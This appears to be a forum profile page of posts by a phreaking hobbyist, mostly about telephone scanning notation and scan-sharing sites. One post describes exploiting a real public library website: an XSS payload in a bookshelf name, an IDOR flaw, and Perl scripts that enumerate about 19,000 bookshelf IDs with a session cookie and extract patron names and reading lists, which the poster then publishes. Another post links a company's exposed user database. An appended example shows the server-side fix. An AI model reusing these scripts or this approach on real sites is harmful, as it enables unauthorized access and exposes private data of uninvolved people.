dual

Everything posted by dual

  1. Besides an international airport, the mall turned out to be a good spot for the first real test of ghettotooth.pl...
  2. Haven't seen it posted, so here ya go... http://www.usdoj.gov/ag/trainingmanual.htm
  3. Was handed this at the London 2600 meeting and scanned it to PDF. The hacker who handed it out was looking for a volunteer to demonstrate his disguise techniques. There weren't any takers before we left, though he may have found one after a few more rounds of pints. Cheers! http://dualisanoob.com/london2600_disguise.pdf And huge thanks to lattera for getting me my account back!
  4. Busted.
  5. Bell's Mind Markup Language (BM2L) is the shorthand method to describe common occurrences in scanning. It's a proposed standard and community input is imperative. Here's the current list:

      CBCAD - Cannot Be Completed As Dialed
      CBCAE - Cannot Be Completed As Entered
      CBRYCA - Cannot Be Reached from Your Calling Area
      DISCO - Disconnected
      DTMF - Dual Tone Multi Frequency tones
      NAYCA - Not Available from Your Calling Area
      NIS - Not In Service
      SIT - Special Information Tone
      TTY - Teletypewriter tones
      VM - Voice Mail

      Please provide input for additions, subtractions or changes. I have two right now:

      - I think we should add 'HELO - Hello?' when the called party answers in a standard fashion
      - I don't think we should add 'RO - Ring Out' as RO is not recognizable, nor is there context to make it such

      Edit: Make that three:

      - I believe scan entries should be in the format 'NPA-NXX-XXXX - DESCRIPTION'. This provides the full number for search tools like grep and provides standardization for entry into databases.
  6. If you call Qwest to cancel your landline service, they'll offer 50% off your bill for four months in honor of the economic downturn. I assume it doesn't include long distance. Sounds like Qwest is hemorrhaging subscribers. Probably should call to "cancel" your service anyway.

      Editorial: Hey, Qwest. Want to keep subscribers? Don't send a disconnect notice the first month of service if payment is a few days late. Especially when the customer's cell provider is much more casual about mistakes and *gasp* always gets paid. Next, quit trying to upsell every time a subscriber calls. Multiple times per call. You're so desperate for a date, you're driving people away. Third, market your landline service in a logical, non-fear inducing fashion: As a low priced, reliable communications service for the place where people spend most of their time, their home, where 911 is most effective, which works when the power's out, and is easy to subscribe to and pay for. Of course, you'd actually have to lower the price and make it easy to subscribe. Say from $13 to $7 to bring final bills from $20 to $15, and have the web sign up actually work. Yeah. I can't imagine why you can't keep subscribers. Making a "dead" technology more deader and all.
  7. Couple of new scans up at http://www.scanaday.net/. Send your fresh scans to handscanaday at gmail dot com.
  8. This should help. http://www.stromcarlson.com/misc/4ess.txt
  9. 16/20. I obviously didn't view source.
  10. From Boing Boing, dig this. http://www.boingboing.net/2009/04/24/boing...g-video-wa.html
  11. Edit: Get the song here instead. http://beemp3.com/download.php?file=189864...song=war+dialer
  12. Name the scan as normal, 20090329_325-235-05xx.scan.txt. Add updates by uploading the same file.
  13. Forty meg wordlist. Not real big. It should do. http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz
  14. Scan it out. http://www.handscan.net/
  15. Check your DNS and/or use OpenDNS, and watching the connection with Wireshark is a great idea. Have you tried getting to Google using a proxy? Please let us know what you find.
  16. It's an inductive loop: http://auto.howstuffworks.com/question234.htm
  17. International numbers are most welcome. As are mp3s. Name them 20090131_555-555-1212.scan.mp3 I'll PM you some creds, Beave, so you can upload.
  18. Just put up three days' worth of scans. Thanks to Rpm and Kayara!
  19. http://www.gwmarketingservices.com/_data/users.mdb

          strings users.mdb | grep -v "]" | less
  20. http://www.handscan.net Generate your scan list then just Ctrl+A and middle click or Ctrl+C, Ctrl+V into your favorite text editor and scan away. More features forthcoming.
  21. Sorry about that. I need to add an override or remove some of the error checking. Edit: I removed the 959 NXX error check and will handle any others on a case-by-case basis.
  22. Jeez, I don't know what took me so long. With the wonders of pre, it now outputs text with the trailing space. And it's still valid. Please let me know if anything doesn't work as it should.
  23. So, yeah, sorry, no moonshine or malware here. This post details a bit about my local library's online bookshelf system.

      I love my local library. You can check out books, movies, music and more at any branch and return them to any branch. You can search for and reserve items online. They have a secure RSS feed for checked in and due date alerts. Plus, they have an online bookshelf, called My Bookshelf, that stores favorited items.

      Each account's My Bookshelf comes with the Default bookshelf. You can then create additional, user-named bookshelves. In a bookshelf you can add and delete items, and choose whether or not to make the bookshelf publicly viewable.

      To get the quick stuff out of the way, I learned that the bookshelf name is vulnerable to XSS. Here you can see HTML rendering. What you can't see is the bookshelf named...

          </li></ul></div>a<script language="JavaScript" type="text/javascript">history.go(-1);</script>

      (Thanks, Evil1!) There are some other oddities regarding bookshelf names that I won't go into here.

      Every user created bookshelf gets its own unique ID, i.e. mybookshelf.jsp?id=XXXXX. Authenticate and put that in the URL bar and you get somebody else's bookshelf. I don't believe you can see other default bookshelves without authenticating as that user. Just unique bookshelves given an ID number. Though you can view bookshelves marked private, which is the default. You can also delete items from another's bookshelf. Not good.

      Here's somebody's bookshelf. Algorithms? I'm terrible at music.

      Given this, I poked around with ID ranges and found that 3000 to 22000 seemed to bound accounts. I wrote a Perl script that used wget's header capability to send the session ID after I authenticated. It accepts four and five-digit IDs, of which I used the latter for sorting.

          #!/usr/bin/perl -w
          use strict;

          # ID range that seemed to bound accounts
          my @array = (3000..22000);

          for my $scalar (@array) {
              # Zero-pad to five digits so the saved files sort in order
              my $id = sprintf("%05d", $scalar);
              # Send the authenticated session cookie as a raw header
              system("wget --no-cookies --header \"Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\" http://www.publiclibrary.org/mybookshelf.jsp?id=$id");
              sleep 1;
          }

      I ran it for about 24 hours and got just over 18,000 files. I removed the empty bookshelves and had over 10,000 left. I then looked at source for the strings I needed to get what I wanted, namely, names and titles. These lines seemed to do it.

          <input type="hidden" name="mbkshelf" value="NAME" alt="">
          <div class="recordListTitle"><a href="controller.jsp?R=XXXXXXXXXX">TITLE</a> </div>

      Another Perl script and we get a nice readable file with bookshelf names and associated titles.

          #!/usr/bin/perl -w
          use strict;

          my $name;
          my %hash;
          my @files = glob "my*";

          foreach my $file (@files) {
              open FILE, '<', $file or die;
              while (<FILE>) {
                  # A bookshelf name starts a new list of titles
                  if (/hidden" name="mbkshelf" value="(.+?)"/) {
                      $name = $1;
                      $hash{$name} = [ ];
                  }
                  # Each title is filed under the most recent name
                  if (/recordListTitle"><.+>(.+?)<\/a>/) {
                      push @{ $hash{$name} }, $1;
                  }
              }
          }

          # Print names case-insensitively sorted, each with its titles
          foreach my $key (sort { lc($a) cmp lc($b) } keys %hash) {
              print "Name:\n";
              print "\t$key\n\n";
              print "Titles:\n";
              foreach my $val ( @{ $hash{$key} } ) {
                  print "\t$val\n";
              }
              print "\n********************************************************************************\n\n";
          }

      I left out autoviv for my clarity and the resulting file is over 3.5 MB raw, 1 MB gzipped. http://dualisanoob.com/mybookshelf/mybookshelf.txt

      Some names are authors, a few are patrons, and one or two are library card numbers. I simply find it fascinating to see what other people are consuming, thinking. Yes, I put two and two together and didn't want to go any further. As I said, I love my library. Though it would be a good exercise...
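As an added example (not part of dual's post and not the library's code), here is a minimal Python model of the server-side fix for the two issues post 23 describes: the bookshelf id taken from the URL is authorized against the session user for both viewing and deleting, and the bookshelf name is HTML-encoded on output. All function names, IDs, owners and sample data are hypothetical.

```python
import html
from dataclasses import dataclass, field
class Forbidden(Exception): pass

@dataclass
class Bookshelf:
    owner: str
    name: str
    public: bool = False  # private is the default, as in the post
    items: list = field(default_factory=list)

# Constructed sample data: IDs, owners and titles are hypothetical.
SHELVES = {
    10001: Bookshelf("alice", "Algorithms", items=["Sorting and Searching"]),
    10002: Bookshelf("bob", "</ul>a<script>history.go(-1);</script>",
                     public=True, items=["Music Theory"]),
}

def load_shelf(session_user, shelf_id, write=False):
    """Resolve the id from the URL, then authorize against the session user."""
    shelf = SHELVES.get(shelf_id)
    # Same error for "no such id" and "not yours": id walks learn nothing.
    if shelf is None:
        raise Forbidden(shelf_id)
    is_owner = shelf.owner == session_user
    if write and not is_owner:                        # deleting: owner only
        raise Forbidden(shelf_id)
    if not write and not (is_owner or shelf.public):  # viewing: owner or public
        raise Forbidden(shelf_id)
    return shelf

def render_shelf(session_user, shelf_id):
    shelf = load_shelf(session_user, shelf_id)
    # Encode the user-chosen name and titles where they are written into HTML.
    name = html.escape(shelf.name, quote=True)
    items = "".join(f"<li>{html.escape(t)}</li>" for t in shelf.items)
    return f'<input type="hidden" name="mbkshelf" value="{name}"><ul>{items}</ul>'

def delete_item(session_user, shelf_id, title):
    shelf = load_shelf(session_user, shelf_id, write=True)
    shelf.items.remove(title)
    return shelf.items

def denied(action, *args):
    try:
        action(*args)
    except Forbidden:
        return True
    return False
```

The authorization decision lives in one function that every read and write path calls, so a new endpoint cannot skip it by accident.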
  24. Upload seems to work.

          [2009-01-12 20:00] [success] 20090111_412-562-00xx.scan.txt
          [2009-01-12 20:00] [success] 20090112_937-222-98xx.scan.txt

      What issues were there? Edit: I noticed that your CGIProxy needs SSL support to access scanaday.net. Any other issues, let me know.
  25. Absolutely, an added description for errors and VM is essential. I added it to the standard. I also added DATU, quiet term and more example numbers. I improved the writing and formatting as well. I was thinking of adding a "pitfalls" section - fast busy vs. reorder, ring out instead of RO, use of HELO and "unknown" - to help users. What do you think? Thanks to everybody for the input. I'm just now starting to implement all of the great suggestions and already the improvement is immense. It's the community's now and it's awesome. http://dualisanoob.com/phreak/articles/bm2l.pdf